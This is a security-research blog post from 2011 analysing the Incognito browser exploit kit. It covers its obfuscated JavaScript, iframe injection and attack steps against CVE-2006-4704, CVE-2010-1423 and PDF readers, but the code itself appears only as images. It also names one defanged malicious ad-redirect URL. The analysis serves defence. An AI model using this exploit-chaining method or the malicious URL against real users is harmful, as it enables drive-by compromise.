Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Subscribe
Incognito Exploit Kit
Security Research

Incognito Exploit Kit

image
THREATLABZ
June 14, 2011 - 2 min read

Exploit kits are becoming an increasingly popular means of spreading attacks. Umesh recently blogged about seeing a spike in the usage of the Blackhole exploit kit. This exploit kit targets multiple known vulnerabilities present in a victim's browser, increasing the probability of a successful compromise. Various exploit kits differ in the way they are packaged, designed and implemented. The most distinguishing factor among different exploit kits is how exploits are obfuscated, in order to bypass various security controls.

Recently, I have noticed a significant increase in the usage of the Incognito exploit kit. Similar to the Blackhole exploit kit, Incognito also targets vulnerabilities in Java and Adobe products. Another item that stands out to differentiate among these exploit kits is the URL patterns used. Most of the time, the URL pattern remains same within a given exploit kit. A quick look at malwaredomainlist shows the usage of common patterns used in URLs associated with Incognito.

Common URL patterns for Incognito:

Image

Code obfuscation (Formatted for good view),

Image

Image

 

De-obfuscation of the aforementioned JavaScript, shows the exploit kit carrying out different attack vectors. Let’s analyze different pieces of the de-obfuscated code.

Object Initializations and other functions,

Image

Image

Image


Iframe Injection:

Image

 

Google safe browsing reports this URL to be malicious. Visiting the above link redirects you to fake search portal delivering ads hxxp://searchportal.information.com/?o_id=164060&domainname=register-domain-names.info.

 

 

Step 0: This is the entry point of the malicious code. It completes required initializations of objects for vulnerable ActiveX controls. Upon the successful creation of objects, it launches the first attack vector by calling function 'gr', which injects a malicious file. The code then moves on to Step 1.

 

Image

Vulnerability Details:
CVE : CVE-2006-4704
Name : Microsoft Visual Studio 2005 WMI Object Broker Remote Code Execution Vulnerability

My previous blog post describes a different version of obfuscated JavaScript targeting this vulnerability.

Step 1 : This code targets the “Java Deployment Toolkit”.


Image

 

Vulnerability Details:
CVE : CVE-2010-1423
Name : Java Deployment Toolkit insufficient argument validation

 

Step 2 : This creates Iframe tags for malicious PDFs.

 

Image

 

 

This example illustrates how the multi-level attacks targeted by exploit kits are becoming a favored choice of attackers these days. More importantly, the creation of automated tools to deliver these exploits, provides attackers with the opportunity to launch campaigns on a frequent basis, with limited technical knowledge.

Pradeep

 

 

 

 

 

form submtited
Thank you for reading

Was this post useful?

Get the latest Zscaler blog updates in your inbox

By submitting the form, you are agreeing to our privacy policy.